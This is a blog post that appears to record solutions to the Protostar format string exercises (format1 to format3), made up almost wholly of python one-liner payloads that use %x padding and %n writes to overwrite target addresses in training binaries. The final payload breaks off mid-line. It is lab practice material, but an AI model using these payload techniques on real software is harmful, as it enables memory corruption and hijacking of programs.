Posts

Showing posts from December, 2016

Exploit Exercises - Format String

Format1:
Padding to last mem dump
run `python -c 'print "\x38\x96\x04\x08"+"AAABB"+"%x."*143'`%x
Write
run `python -c 'print "\x38\x96\x04\x08"+"AAABB"+"%x."*143'`%n
DMA
/opt/protostar/bin/format1 `python -c 'print "CC"+"\x38\x96\x04\x08"+"AAA%142$n"'`
Format2 need write value to address:
POC:
python -c 'print "\xe4\x96\x04\x08%42x"+"%x."*2+"%n"' > foo
|Address|Value|Padding|%n

DMA
python -c 'print "\xe4\x96\x04\x08"+"%60u%4$n"'  |  /opt/protostar/bin/format2

Format3: write 4 byte with speacify address: POC: python -c 'print "\xf4\x96\x04\x08"+"%x"*10+"%11x%n"+"BB"+"\xf5\x96\x04\x08"+"%x"*6+"%475x%n"+"B"+"\xf6\x96\x04\x08"+"%x"*4+"%136x%n"+"B"+"\xf7\x96\x04\x08"+"%x&qu…